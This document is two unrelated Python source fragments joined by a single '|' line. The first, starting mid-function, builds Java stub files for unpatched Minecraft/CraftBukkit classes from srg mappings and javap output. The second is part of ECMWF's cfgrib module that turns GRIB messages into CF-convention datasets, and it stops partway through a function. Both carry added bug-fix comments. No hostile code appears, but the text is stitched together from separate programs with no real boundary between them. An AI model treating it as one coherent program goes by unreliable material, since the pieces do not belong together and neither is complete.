    """Return the set of all class names (mc-dev naming) from the srg mapping."""
    # Fix: docstring moved inside the def (it was a no-op expression before
    # it); use the ALL_CLASS_LIST_SRG constant (same path) instead of a
    # duplicated hard-coded string; close the file; drop the unused `fields`.
    classes = []
    with open(ALL_CLASS_LIST_SRG) as fp:
        for line in fp:
            tokens = line.strip().split(" ")
            # "CL:" records are class mappings; tokens[1] is the class path.
            if tokens[0] == "CL:":
                classes.append(tokens[1])
    return set(classes)
def generateStubFromJavap(fullClassPath, filename):
    """Generate a compilable-but-empty Java stub for fullClassPath into filename.

    Runs javap against MC_DEV_EXTRACTED_DIR to obtain the class signatures,
    then: methods get named parameters and a body that throws
    NotImplementedException (abstract methods get a bare ';'), public/protected
    static fields get type-appropriate initializers, and the always-empty
    static initializer block is dropped.
    """
    # (Docstring moved inside the def; it previously sat above it as a no-op.)
    package = ".".join(fullClassPath.split("/")[:-1])
    className = fullClassPath.split("/")[-1]
    # open() + with instead of the Python-2-only file() builtin, so the handle
    # is closed even if javap parsing fails part-way.
    with open(filename, "w") as f:
        header = """// Auto-generated methods stubs for %s
package %s;
import org.apache.commons.lang.NotImplementedException;
""" % (className, package)
        f.write(header)
        # universal_newlines=True makes communicate() return text on Python 3
        # (on Python 2 it already returned str).
        lines = subprocess.Popen(["javap", "-classpath", MC_DEV_EXTRACTED_DIR, fullClassPath],
                                 stdout=subprocess.PIPE,
                                 universal_newlines=True).communicate()[0].split("\n")
        if "Compiled" in lines[0]:
            lines = lines[1:]  # skip initial "Compiled from" line, if present
        for line in lines:
            line = line.replace(package + ".", "")  # already in package
            line = line.replace(" final ", " ")  # stubs cannot keep final fields
            if "{}" in line:
                # Skip static initializer (always empty)
                continue
            if ")" in line:
                # Methods - add parameter names and body
                parts = line.split("(")
                retn = parts[0]
                args = parts[1].replace(");", "").split(", ")
                if len(args) == 1 and len(args[0]) == 0:
                    args = []
                namedArgs = []
                for i, arg in enumerate(args):
                    namedArgs.append("%s par%d" % (arg, i + 1))
                if " abstract " in line:
                    # abstract methods can't have a body
                    body = ";"
                else:
                    body = "{ throw new NotImplementedException(); }"
                line = retn + "(" + ", ".join(namedArgs) + ")" + body
            # Fix: " protecte static" was a typo, so protected static fields
            # never received initializers.
            elif line.startswith(" public static") or line.startswith(" protected static"):  # not doing private
                # static fields need initializers
                tokens = line.strip().replace(";", "").split(" ")
                if "byte" in tokens or "short" in tokens or "int" in tokens:
                    default = "0"
                elif "long" in tokens:
                    default = "0L"
                elif "float" in tokens:
                    default = "0.0f"
                elif "double" in tokens:
                    default = "0.0d"
                elif "char" in tokens:
                    # Fix: escape the backslash so the emitted Java literal is
                    # '\u0000'; an unescaped "\u0000" is a real NUL character
                    # under Python 3.
                    default = "'\\u0000'"
                elif "boolean" in tokens:
                    default = "false"
                else:
                    default = "null"
                line = line.replace(";", " = %s;" % (default,))
            f.write(line + "\n")
def main():
    """Generate stub .java files for every class CraftBukkit does not patch."""
    unpatched = getAll() - getPatchedByCB()
    for fullClassPath in sorted(unpatched):
        filename = OUT_STUB_DIR + fullClassPath + ".java"
        if os.path.exists(filename):
            # print "File already exists:", filename
            # raise SystemExit
            pass
        dirname = os.path.dirname(filename)
        if not os.path.exists(dirname):
            # org/ dirs need to be created; CB only has net/
            # Fix: os.makedirs is the recursive mkdir the original comment
            # asked for, and removes the shell-injection risk the original
            # os.system("mkdir -p " + ...) flagged about itself.
            os.makedirs(dirname)
        # print(...) form is valid on both Python 2 and Python 3.
        print(filename)
        generateStubFromJavap(fullClassPath, filename)


if __name__ == "__main__":
    main()
|
#
# Copyright 2017-2021 European Centre for Medium-Range Weather Forecasts (ECMWF).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Alessandro Amici - B-Open - https://bopen.eu
# Aureliana Barghini - B-Open - https://bopen.eu
#
import datetime
import json
import logging
import os
import typing as T
import attr
import numpy as np # type: ignore
from . import __version__, cfmessage, messages
LOG = logging.getLogger(__name__)
#
# Edition-independent keys in ecCodes namespaces. Documented in:
# https://software.ecmwf.int/wiki/display/ECC/GRIB%3A+Namespaces
#
# Attributes read once per dataset; enforce_unique_attributes() requires a
# single value for each of these across all indexed messages.
GLOBAL_ATTRIBUTES_KEYS = ["edition", "centre", "centreDescription", "subCentre"]
# Attributes read once per data variable; must be unique within one paramId.
DATA_ATTRIBUTES_KEYS = [
    "paramId",
    "dataType",
    "numberOfPoints",
    "typeOfLevel",
    "stepUnits",
    "stepType",
    "gridType",
]
# Optional per-variable attributes: read best-effort, missing keys are skipped.
EXTRA_DATA_ATTRIBUTES_KEYS = [
    "shortName",
    "units",
    "name",
    "cfName",
    "cfVarName",
    "missingValue",
    "totalNumber",
    "numberOfDirections",
    "numberOfFrequencies",
    "NV",
    "gridDefinitionDescription",
]
# Geometry keys per gridType: read as extra variable attributes for messages
# of that grid type (see the extra_keys handling in build_variable_components).
GRID_TYPE_MAP = {
    "regular_ll": [
        "Nx",
        "iDirectionIncrementInDegrees",
        "iScansNegatively",
        "longitudeOfFirstGridPointInDegrees",
        "longitudeOfLastGridPointInDegrees",
        "Ny",
        "jDirectionIncrementInDegrees",
        "jPointsAreConsecutive",
        "jScansPositively",
        "latitudeOfFirstGridPointInDegrees",
        "latitudeOfLastGridPointInDegrees",
    ],
    "rotated_ll": [
        "Nx",
        "Ny",
        "angleOfRotationInDegrees",
        "iDirectionIncrementInDegrees",
        "iScansNegatively",
        "jDirectionIncrementInDegrees",
        "jPointsAreConsecutive",
        "jScansPositively",
        "latitudeOfFirstGridPointInDegrees",
        "latitudeOfLastGridPointInDegrees",
        "latitudeOfSouthernPoleInDegrees",
        "longitudeOfFirstGridPointInDegrees",
        "longitudeOfLastGridPointInDegrees",
        "longitudeOfSouthernPoleInDegrees",
    ],
    "reduced_ll": [
        "Ny",
        "jDirectionIncrementInDegrees",
        "jPointsAreConsecutive",
        "jScansPositively",
        "latitudeOfFirstGridPointInDegrees",
        "latitudeOfLastGridPointInDegrees",
    ],
    "regular_gg": [
        "Nx",
        "iDirectionIncrementInDegrees",
        "iScansNegatively",
        "longitudeOfFirstGridPointInDegrees",
        "longitudeOfLastGridPointInDegrees",
        "N",
        "Ny",
    ],
    "rotated_gg": [
        "Nx",
        "Ny",
        "angleOfRotationInDegrees",
        "iDirectionIncrementInDegrees",
        "iScansNegatively",
        "jPointsAreConsecutive",
        "jScansPositively",
        "latitudeOfFirstGridPointInDegrees",
        "latitudeOfLastGridPointInDegrees",
        "latitudeOfSouthernPoleInDegrees",
        "longitudeOfFirstGridPointInDegrees",
        "longitudeOfLastGridPointInDegrees",
        "longitudeOfSouthernPoleInDegrees",
        "N",
    ],
    "lambert": [
        "LaDInDegrees",
        "LoVInDegrees",
        "iScansNegatively",
        "jPointsAreConsecutive",
        "jScansPositively",
        "latitudeOfFirstGridPointInDegrees",
        "latitudeOfSouthernPoleInDegrees",
        "longitudeOfFirstGridPointInDegrees",
        "longitudeOfSouthernPoleInDegrees",
        "DyInMetres",
        "DxInMetres",
        "Latin2InDegrees",
        "Latin1InDegrees",
        "Ny",
        "Nx",
    ],
    "reduced_gg": ["N", "pl"],
    "sh": ["M", "K", "J"],
}
# Union of all geometry keys across every grid type, de-duplicated and sorted.
GRID_TYPE_KEYS = sorted(set(k for _, ks in GRID_TYPE_MAP.items() for k in ks))
ENSEMBLE_KEYS = ["number"]
# the ":float" suffix is stripped when naming the coordinate; presumably it
# selects the ecCodes key type -- TODO confirm against messages.FileIndex
VERTICAL_KEYS = ["level:float"]
DATA_TIME_KEYS = ["dataDate", "dataTime", "endStep"]
# keys accepted as CF reference-time dimensions (validated in encode_cf_first)
ALL_REF_TIME_KEYS = [
    "time",
    "step",
    "valid_time",
    "verifying_time",
    "forecastMonth",
    "indexing_time",
]
SPECTRA_KEYS = ["directionNumber", "frequencyNumber"]
ALL_HEADER_DIMS = ENSEMBLE_KEYS + VERTICAL_KEYS + SPECTRA_KEYS
# default set of keys used to index a GRIB file
INDEX_KEYS = sorted(
    GLOBAL_ATTRIBUTES_KEYS + DATA_ATTRIBUTES_KEYS + DATA_TIME_KEYS + ALL_HEADER_DIMS
)
# CF attributes attached to well-known coordinate variables, keyed by the
# coordinate name (for vertical coordinates, the GRIB typeOfLevel value).
COORD_ATTRS = {
    # geography
    "latitude": {"units": "degrees_north", "standard_name": "latitude", "long_name": "latitude"},
    "longitude": {"units": "degrees_east", "standard_name": "longitude", "long_name": "longitude"},
    # vertical
    "depthBelowLand": {
        "units": "m",
        "positive": "down",
        "long_name": "soil depth",
        "standard_name": "depth",
    },
    "depthBelowLandLayer": {
        "units": "m",
        "positive": "down",
        "long_name": "soil depth",
        "standard_name": "depth",
    },
    "hybrid": {
        "units": "1",
        "positive": "down",
        "long_name": "hybrid level",
        "standard_name": "atmosphere_hybrid_sigma_pressure_coordinate",
    },
    "heightAboveGround": {
        "units": "m",
        "positive": "up",
        "long_name": "height above the surface",
        "standard_name": "height",
    },
    # "stored_direction": "decreasing" makes build_variable_components sort
    # the coordinate values in reverse
    "isobaricInhPa": {
        "units": "hPa",
        "positive": "down",
        "stored_direction": "decreasing",
        "standard_name": "air_pressure",
        "long_name": "pressure",
    },
    "isobaricInPa": {
        "units": "Pa",
        "positive": "down",
        "stored_direction": "decreasing",
        "standard_name": "air_pressure",
        "long_name": "pressure",
    },
    "isobaricLayer": {
        "units": "Pa",
        "positive": "down",
        "standard_name": "air_pressure",
        "long_name": "pressure",
    },
    # ensemble
    "number": {
        "units": "1",
        "standard_name": "realization",
        "long_name": "ensemble member numerical id",
    },
    # time
    "step": {
        "units": "hours",
        "standard_name": "forecast_period",
        "long_name": "time since forecast_reference_time",
    },
    "time": {
        "units": "seconds since 1970-01-01T00:00:00",
        "calendar": "proleptic_gregorian",
        "standard_name": "forecast_reference_time",
        "long_name": "initial time of forecast",
    },
    "indexing_time": {
        "units": "seconds since 1970-01-01T00:00:00",
        "calendar": "proleptic_gregorian",
        "standard_name": "forecast_reference_time",
        "long_name": "nominal initial time of forecast",
    },
    "valid_time": {
        "units": "seconds since 1970-01-01T00:00:00",
        "calendar": "proleptic_gregorian",
        "standard_name": "time",
        "long_name": "time",
    },
    "verifying_time": {
        "units": "seconds since 1970-01-01T00:00:00",
        "calendar": "proleptic_gregorian",
        "standard_name": "time",
        "long_name": "time",
    },
    "forecastMonth": {"units": "1", "long_name": "months since forecast_reference_time"},
}
class DatasetBuildError(ValueError):
    """Raised when a GRIB index cannot be mapped to a single hypercube."""

    def __str__(self) -> str:
        # Only the human-readable message (first argument) is rendered; any
        # extra args carry the offending key and the candidate filters.
        message = self.args[0]
        return str(message)
def enforce_unique_attributes(index, attributes_keys, filter_by_keys=None):
    # type: (T.Mapping[str, T.Any], T.Sequence[str], T.Optional[T.Dict[str, T.Any]]) -> T.Dict[str, T.Any]
    """Collect ``GRIB_``-prefixed attributes from *index* for *attributes_keys*.

    Keys with the placeholder values ``"undef"``/``"unknown"`` are skipped.
    Raises DatasetBuildError when a key has more than one value, carrying one
    candidate ``filter_by_keys`` per conflicting value so the caller can
    suggest how to re-open the file unambiguously.
    """
    # ``None`` sentinel instead of a mutable ``{}`` default (shared-state pitfall)
    if filter_by_keys is None:
        filter_by_keys = {}
    attributes = {}  # type: T.Dict[str, T.Any]
    for key in attributes_keys:
        values = index[key]
        if len(values) > 1:
            fbks = []
            for value in values:
                fbk = {key: value}
                fbk.update(filter_by_keys)
                fbks.append(fbk)
            raise DatasetBuildError("multiple values for key %r" % key, key, fbks)
        if values and values[0] not in ("undef", "unknown"):
            attributes["GRIB_" + key] = values[0]
    return attributes
@attr.attrs(auto_attribs=True, eq=False)
class Variable(object):
    """A netCDF-like variable: dimension names, a data array and attributes."""

    dimensions: T.Tuple[str, ...]
    data: np.ndarray
    # BUG FIX: ``default={}`` makes every instance share one dict, so mutating
    # one variable's attributes (e.g. adding "stored_direction") silently leaks
    # into all others; ``factory=dict`` builds a fresh dict per instance.
    attributes: T.Dict[str, T.Any] = attr.attrib(factory=dict, repr=False)

    def __eq__(self, other):
        # type: (T.Any) -> bool
        if other.__class__ is not self.__class__:
            return NotImplemented
        equal = (self.dimensions, self.attributes) == (other.dimensions, other.attributes)
        return equal and np.array_equal(self.data, other.data)
def expand_item(item, shape):
    # type: (T.Tuple[T.Any, ...], T.Sequence[int]) -> T.Tuple[T.List[int], ...]
    """Normalize every header index in *item* to an explicit list of ints."""

    def as_index_list(index, size):
        # lists/arrays of indices are coerced to int lists, slices are
        # enumerated against *size*, a scalar becomes a one-element list
        if isinstance(index, (list, np.ndarray)):
            return [int(e) for e in index]
        if isinstance(index, slice):
            return list(range(index.start or 0, index.stop or size, index.step or 1))
        if isinstance(index, int):
            return [index]
        raise TypeError("Unsupported index type %r" % type(index))

    return tuple(as_index_list(i, size) for i, size in zip(item, shape))
@attr.attrs(auto_attribs=True)
class OnDiskArray(object):
    # Lazy, read-only array view over the fields of a GRIB file: every access
    # re-opens the file and decodes only the messages that fall in the selection.
    stream: messages.FileStream
    shape: T.Tuple[int, ...]
    # header indexes (one int per header dimension) -> message offset(s);
    # only offset[0] is used to seek the message
    offsets: T.Dict[T.Tuple[T.Any, ...], T.List[T.Union[int, T.Tuple[int, int]]]] = attr.attrib(
        repr=False
    )
    # sentinel value in the GRIB payload decoded to NaN
    missing_value: float
    # number of trailing geography dimensions (e.g. 1 for 'values', 2 for y/x)
    geo_ndim: int = attr.attrib(default=1, repr=False)
    dtype = np.dtype("float32")
    def build_array(self) -> np.ndarray:
        """Helper method used to test __getitem__"""
        array = np.full(self.shape, fill_value=np.nan, dtype="float32")
        with open(self.stream.path, "rb") as file:
            for header_indexes, offset in self.offsets.items():
                # NOTE: fill a single field as found in the message
                message = self.stream.message_from_file(file, offset=offset[0])
                values = message.message_get("values", float)
                array.__getitem__(header_indexes).flat[:] = values
        array[array == self.missing_value] = np.nan
        return array
    def __getitem__(self, item):
        # type: (T.Tuple[T.Any, ...]) -> np.ndarray
        # Normalize the header part of the index to explicit lists, then build a
        # reverse map: requested header value -> its position in the output.
        header_item_list = expand_item(item[: -self.geo_ndim], self.shape)
        header_item = [{ix: i for i, ix in enumerate(it)} for it in header_item_list]
        array_field_shape = tuple(len(l) for l in header_item_list) + self.shape[-self.geo_ndim :]
        array_field = np.full(array_field_shape, fill_value=np.nan, dtype="float32")
        with open(self.stream.path, "rb") as file:
            for header_indexes, offset in self.offsets.items():
                try:
                    array_field_indexes = [it[ix] for it, ix in zip(header_item, header_indexes)]
                except KeyError:
                    # this message is outside the requested selection
                    continue
                # NOTE: fill a single field as found in the message
                message = self.stream.message_from_file(file, offset=offset[0])
                values = message.message_get("values", float)
                array_field.__getitem__(tuple(array_field_indexes)).flat[:] = values
        # apply the geography part of the index, then decode missing values
        array = array_field[(Ellipsis,) + item[-self.geo_ndim :]]
        array[array == self.missing_value] = np.nan
        for i, it in reversed(list(enumerate(item[: -self.geo_ndim]))):
            if isinstance(it, int):
                # drop axes indexed with a scalar, mimicking numpy indexing
                array = array[(slice(None, None, None),) * i + (0,)]
        return array
# Grid types whose latitudes/longitudes form 1-D dimension coordinates.
GRID_TYPES_DIMENSION_COORDS = {"regular_ll", "regular_gg"}
# Grid types that need full 2-D latitude/longitude auxiliary coordinates.
GRID_TYPES_2D_NON_DIMENSION_COORDS = {
    "rotated_ll",
    "rotated_gg",
    "lambert",
    "lambert_azimuthal_equal_area",
    "albers",
    "polar_stereographic",
}
def build_geography_coordinates(
    first,  # type: messages.Message
    encode_cf,  # type: T.Sequence[str]
    errors,  # type: str
    log=LOG,  # type: logging.Logger
):
    # type: (...) -> T.Tuple[T.Tuple[str, ...], T.Tuple[int, ...], T.Dict[str, Variable]]
    """Build dimension names, shape and coordinate variables for the grid of *first*.

    Regular grids get 1-D dimension coordinates, rotated/projected grids 2-D
    auxiliary coordinates, anything else a flat 'values' dimension.  When
    *errors* is not "ignore", missing latitudes/longitudes are logged.
    """
    geo_coord_vars = {}  # type: T.Dict[str, Variable]
    grid_type = first["gridType"]
    if "geography" in encode_cf and grid_type in GRID_TYPES_DIMENSION_COORDS:
        geo_dims = ("latitude", "longitude")  # type: T.Tuple[str, ...]
        geo_shape = (first["Ny"], first["Nx"])  # type: T.Tuple[int, ...]
        latitudes = np.array(first["distinctLatitudes"], ndmin=1)
        # CONSISTENCY FIX: always pass a .copy() of the COORD_ATTRS entry so no
        # Variable ever aliases (and can mutate) the module-level defaults --
        # the latitude branch below mutates its attributes dict in place.
        geo_coord_vars["latitude"] = Variable(
            dimensions=("latitude",), data=latitudes, attributes=COORD_ATTRS["latitude"].copy()
        )
        if latitudes[0] > latitudes[-1]:
            geo_coord_vars["latitude"].attributes["stored_direction"] = "decreasing"
        geo_coord_vars["longitude"] = Variable(
            dimensions=("longitude",),
            data=np.array(first["distinctLongitudes"], ndmin=1),
            attributes=COORD_ATTRS["longitude"].copy(),
        )
    elif "geography" in encode_cf and grid_type in GRID_TYPES_2D_NON_DIMENSION_COORDS:
        geo_dims = ("y", "x")
        geo_shape = (first["Ny"], first["Nx"])
        try:
            geo_coord_vars["latitude"] = Variable(
                dimensions=("y", "x"),
                data=np.array(first["latitudes"]).reshape(geo_shape),
                attributes=COORD_ATTRS["latitude"].copy(),
            )
            geo_coord_vars["longitude"] = Variable(
                dimensions=("y", "x"),
                data=np.array(first["longitudes"]).reshape(geo_shape),
                attributes=COORD_ATTRS["longitude"].copy(),
            )
        except KeyError:  # pragma: no cover
            if errors != "ignore":
                log.warning("ecCodes provides no latitudes/longitudes for gridType=%r", grid_type)
    else:
        geo_dims = ("values",)
        geo_shape = (first["numberOfPoints"],)
        # add secondary coordinates if ecCodes provides them
        try:
            latitude = first["latitudes"]
            geo_coord_vars["latitude"] = Variable(
                dimensions=("values",),
                data=np.array(latitude),
                attributes=COORD_ATTRS["latitude"].copy(),
            )
            longitude = first["longitudes"]
            geo_coord_vars["longitude"] = Variable(
                dimensions=("values",),
                data=np.array(longitude),
                attributes=COORD_ATTRS["longitude"].copy(),
            )
        except KeyError:  # pragma: no cover
            if errors != "ignore":
                log.warning("ecCodes provides no latitudes/longitudes for gridType=%r", grid_type)
    return geo_dims, geo_shape, geo_coord_vars
def encode_cf_first(data_var_attrs, encode_cf=("parameter", "time"), time_dims=("time", "step")):
    # type: (T.MutableMapping[str, T.Any], T.Sequence[str], T.Sequence[str]) -> T.List[str]
    """Apply CF encodings to *data_var_attrs* in place and return the coordinate keys."""
    coords_map = list(ENSEMBLE_KEYS)
    param_id = data_var_attrs.get("GRIB_paramId", "undef")
    data_var_attrs["long_name"] = "original GRIB paramId: %s" % param_id
    data_var_attrs["units"] = "1"
    if "parameter" in encode_cf:
        # prefer CF names/units from the GRIB tables when they are available
        for cf_key, grib_key in [
            ("standard_name", "GRIB_cfName"),
            ("long_name", "GRIB_name"),
            ("units", "GRIB_units"),
        ]:
            if grib_key in data_var_attrs:
                data_var_attrs[cf_key] = data_var_attrs[grib_key]
    if "time" in encode_cf:
        if not set(time_dims).issubset(ALL_REF_TIME_KEYS):
            raise ValueError("time_dims %r not a subset of %r" % (time_dims, ALL_REF_TIME_KEYS))
        coords_map.extend(time_dims)
    else:
        coords_map.extend(DATA_TIME_KEYS)
    coords_map.extend(VERTICAL_KEYS)
    coords_map.extend(SPECTRA_KEYS)
    return coords_map
def read_data_var_attrs(first, extra_keys):
    # type: (messages.Message, T.List[str]) -> T.Dict[str, T.Any]
    """Read *extra_keys* from the GRIB message *first* as ``GRIB_``-prefixed attributes.

    Keys the message does not define are silently skipped (best effort).
    """
    attributes = {}
    for key in extra_keys:
        try:
            attributes["GRIB_" + key] = first[key]
        except Exception:
            # best-effort read; a bare ``except:`` would also swallow
            # KeyboardInterrupt/SystemExit, which must stay deliverable
            pass
    return attributes
def build_variable_components(
    index: messages.FileIndex,
    encode_cf: T.Sequence[str] = (),
    filter_by_keys: T.Dict[str, T.Any] = {},
    log: logging.Logger = LOG,
    errors: str = "warn",
    squeeze: bool = True,
    read_keys: T.Iterable[str] = (),
    time_dims: T.Sequence[str] = ("time", "step"),
    extra_coords: T.Dict[str, str] = {},
) -> T.Tuple[T.Dict[str, int], Variable, T.Dict[str, Variable]]:
    """Build dimensions, the data variable and coordinate variables for one paramId.

    Raises DatasetBuildError (via enforce_unique_attributes) when an attribute
    key has more than one value in *index*, and ValueError when an extra
    coordinate is not a function of its dimension.
    """
    data_var_attrs = enforce_unique_attributes(index, DATA_ATTRIBUTES_KEYS, filter_by_keys)
    grid_type_keys = GRID_TYPE_MAP.get(index.getone("gridType"), [])
    extra_keys = sorted(list(read_keys) + EXTRA_DATA_ATTRIBUTES_KEYS + grid_type_keys)
    first = index.first()
    extra_attrs = read_data_var_attrs(first, extra_keys)
    data_var_attrs.update(**extra_attrs)
    coords_map = encode_cf_first(data_var_attrs, encode_cf, time_dims)
    coord_name_key_map = {}
    coord_vars = {}
    for coord_key in coords_map:
        values = index[coord_key]
        if len(values) == 1 and values[0] == "undef":
            log.debug("missing from GRIB stream: %r" % coord_key)
            continue
        orig_name = coord_key.partition(":")[0]
        coord_name = orig_name
        if (
            "vertical" in encode_cf
            and coord_name == "level"
            and "GRIB_typeOfLevel" in data_var_attrs
        ):
            # CF vertical encoding: name the level coordinate after its type
            coord_name = data_var_attrs["GRIB_typeOfLevel"]
        coord_name_key_map[coord_name] = coord_key
        attributes = {
            "long_name": "original GRIB coordinate for key: %s(%s)" % (orig_name, coord_name),
            "units": "1",
        }
        attributes.update(COORD_ATTRS.get(coord_name, {}).copy())
        data = np.array(sorted(values, reverse=attributes.get("stored_direction") == "decreasing"))
        dimensions = (coord_name,)  # type: T.Tuple[str, ...]
        if squeeze and len(values) == 1:
            # scalar coordinate: drop its dimension
            data = data[0]
            dimensions = ()
        coord_vars[coord_name] = Variable(dimensions=dimensions, data=data, attributes=attributes)
    header_dimensions = tuple(d for d, c in coord_vars.items() if not squeeze or c.data.size > 1)
    header_shape = tuple(coord_vars[d].data.size for d in header_dimensions)
    geo_dims, geo_shape, geo_coord_vars = build_geography_coordinates(first, encode_cf, errors)
    dimensions = header_dimensions + geo_dims
    shape = header_shape + geo_shape
    coord_vars.update(geo_coord_vars)
    offsets = {}  # type: T.Dict[T.Tuple[int, ...], T.List[T.Union[int, T.Tuple[int, int]]]]
    header_value_index = {}
    extra_coords_data: T.Dict[str, T.Dict[str, T.Any]] = {
        coord_name: {} for coord_name in extra_coords
    }
    extra_dims = list(extra_coords.values())
    # map each coordinate value to its index position along its dimension
    for dim in list(header_dimensions) + extra_dims:
        if np.isscalar(coord_vars[dim].data):
            # BUG FIX: np.asscalar() was removed in NumPy 1.23;
            # np.asarray(...).item() is the supported equivalent.
            header_value_index[dim] = {np.asarray(coord_vars[dim].data).item(): 0}
        else:
            header_value_index[dim] = {v: i for i, v in enumerate(coord_vars[dim].data.tolist())}
    for header_values, offset in index.offsets:
        header_indexes = []  # type: T.List[int]
        for dim in list(header_dimensions) + extra_dims:
            header_value = header_values[index.index_keys.index(coord_name_key_map.get(dim, dim))]
            if dim in header_dimensions:
                header_indexes.append(header_value_index[dim][header_value])
            for coord_name in extra_coords:
                coord_value = header_values[
                    index.index_keys.index(coord_name_key_map.get(coord_name, coord_name))
                ]
                if dim == extra_coords[coord_name]:
                    # an extra coordinate must be a function of its dimension:
                    # the same dimension value may not map to two coord values
                    saved_coord_value = extra_coords_data[coord_name].get(
                        header_value, coord_value
                    )
                    if saved_coord_value != coord_value:
                        raise ValueError(
                            f"'{coord_name}' cannot be indexed by dimension '{extra_coords[coord_name]}': \n"
                            f"found two '{coord_name}' distinct values ({saved_coord_value}, {coord_value}) "
                            f"for '{extra_coords[coord_name]}' value {header_value}."
                        )
                    extra_coords_data[coord_name][header_value] = coord_value
        offsets[tuple(header_indexes)] = offset
    missing_value = data_var_attrs.get("missingValue", 9999)
    data = OnDiskArray(
        stream=index.filestream,
        shape=shape,
        offsets=offsets,
        missing_value=missing_value,
        geo_ndim=len(geo_dims),
    )
    if "time" in coord_vars and "step" in coord_vars:
        # add the 'valid_time' secondary coordinate
        time_dims, time_data = cfmessage.build_valid_time(
            coord_vars["time"].data, coord_vars["step"].data,
        )
        attrs = COORD_ATTRS["valid_time"]
        coord_vars["valid_time"] = Variable(dimensions=time_dims, data=time_data, attributes=attrs)
    for coord_name in extra_coords:
        coord_data = np.array(list(extra_coords_data[coord_name].values()))
        if extra_coords[coord_name] not in header_dimensions:
            # the dimension was squeezed away: store a scalar coordinate
            coord_dimensions: T.Tuple[str, ...] = ()
            coord_data = coord_data.reshape(())
        else:
            coord_dimensions = (extra_coords[coord_name],)
        coord_vars[coord_name] = Variable(dimensions=coord_dimensions, data=coord_data,)
    data_var_attrs["coordinates"] = " ".join(coord_vars.keys())
    data_var = Variable(dimensions=dimensions, data=data, attributes=data_var_attrs)
    dims = {d: s for d, s in zip(dimensions, data_var.data.shape)}
    return dims, data_var, coord_vars
def dict_merge(master, update):
    # type: (T.Dict[str, T.Any], T.Dict[str, T.Any]) -> None
    """Merge *update* into *master* in place, rejecting conflicting values."""
    for key, value in update.items():
        if key not in master:
            master[key] = value
        elif master[key] != value:
            # the same name must not map to two different definitions
            raise DatasetBuildError(
                "key present and new value is different: "
                "key=%r value=%r new_value=%r" % (key, master[key], value)
            )
def build_dataset_attributes(index, filter_by_keys, encoding):
    # type: (messages.FileIndex, T.Dict[str, T.Any], T.Dict[str, T.Any]) -> T.Dict[str, T.Any]
    """Build the dataset-level attributes, including a provenance 'history' entry."""
    attributes = enforce_unique_attributes(index, GLOBAL_ATTRIBUTES_KEYS, filter_by_keys)
    attributes["Conventions"] = "CF-1.7"
    if "GRIB_centreDescription" in attributes:
        attributes["institution"] = attributes["GRIB_centreDescription"]
    # minute-resolution timestamp: drop fractional seconds, then truncate
    timestamp = datetime.datetime.now().isoformat().partition(".")[0][:16]
    history_in = (
        "{timestamp} GRIB to CDM+CF via "
        "cfgrib-{cfgrib_version}/ecCodes-{eccodes_version} with {cfgrib_open_kwargs}"
    )
    attributes["history"] = history_in.format(
        timestamp=timestamp,
        cfgrib_version=__version__,
        eccodes_version=messages.eccodes_version,
        cfgrib_open_kwargs=json.dumps(encoding),
    )
    return attributes
def build_dataset_components(
    index: messages.FileIndex,
    errors: str = "warn",
    encode_cf: T.Sequence[str] = ("parameter", "time", "geography", "vertical"),
    squeeze: bool = True,
    log: logging.Logger = LOG,
    read_keys: T.Iterable[str] = (),
    time_dims: T.Sequence[str] = ("time", "step"),
    extra_coords: T.Dict[str, str] = {},
) -> T.Tuple[T.Dict[str, int], T.Dict[str, Variable], T.Dict[str, T.Any], T.Dict[str, T.Any]]:
    """Build dimensions, variables, attributes and encoding for the whole index.

    One data variable is built per paramId; merge conflicts are skipped,
    logged or re-raised according to *errors* ("ignore"/"raise"/"warn").
    """
    dimensions = {}  # type: T.Dict[str, int]
    variables = {}  # type: T.Dict[str, Variable]
    filter_by_keys = index.filter_by_keys
    for param_id in index["paramId"]:
        var_index = index.subindex(paramId=param_id)
        try:
            dims, data_var, coord_vars = build_variable_components(
                var_index,
                encode_cf,
                filter_by_keys,
                errors=errors,
                squeeze=squeeze,
                read_keys=read_keys,
                time_dims=time_dims,
                extra_coords=extra_coords,
            )
        except DatasetBuildError as ex:
            # NOTE: When a variable has more than one value for an attribute we need to raise all
            # the values in the file, not just the ones associated with that variable. See #54.
            key = ex.args[1]
            error_message = "multiple values for unique key, try re-open the file with one of:"
            fbks = []
            for value in index[key]:
                fbk = {key: value}
                fbk.update(filter_by_keys)
                fbks.append(fbk)
                # BUG FIX: this line used to sit outside the loop, so only the
                # last candidate filter was reported although the message
                # promises "one of:" -- append every candidate instead.
                error_message += "\n filter_by_keys=%r" % fbk
            raise DatasetBuildError(error_message, key, fbks)
        short_name = data_var.attributes.get("GRIB_shortName", "paramId_%d" % param_id)
        var_name = data_var.attributes.get("GRIB_cfVarName", "unknown")
        if "parameter" in encode_cf and var_name not in ("undef", "unknown"):
            short_name = var_name
        try:
            dict_merge(variables, coord_vars)
            dict_merge(variables, {short_name: data_var})
            dict_merge(dimensions, dims)
        except ValueError:
            # DatasetBuildError subclasses ValueError: handle merge conflicts
            if errors == "ignore":
                pass
            elif errors == "raise":
                raise
            else:
                log.exception("skipping variable: paramId==%r shortName=%r", param_id, short_name)
    encoding = {
        "source": index.filestream.path,
        "filter_by_keys": filter_by_keys,
        "encode_cf": encode_cf,
    }
    attributes = build_dataset_attributes(index, filter_by_keys, encoding)
    return dimensions, variables, attributes, encoding
@attr.attrs(auto_attribs=True)
class Dataset(object):
    """
    Map a GRIB file to the NetCDF Common Data Model with CF Conventions.
    """
    # dimension name -> size
    dimensions: T.Dict[str, int]
    # variable name -> Variable (data variables and coordinates alike)
    variables: T.Dict[str, Variable]
    # dataset-level (global) attributes
    attributes: T.Dict[str, T.Any]
    # keyword arguments that allow re-opening the file the same way
    encoding: T.Dict[str, T.Any]
def open_fileindex(
    path: T.Union[str, "os.PathLike[str]"],
    grib_errors: str = "warn",
    indexpath: str = "{path}.{short_hash}.idx",
    index_keys: T.Sequence[str] = INDEX_KEYS + ["time", "step"],
    filter_by_keys: T.Dict[str, T.Any] = {},
) -> messages.FileIndex:
    """Index the GRIB file at *path* and return the subindex selected by *filter_by_keys*."""
    path = os.fspath(path)
    # every filter key must also be indexed; sort for a stable key order
    all_keys = set(index_keys) | set(filter_by_keys)
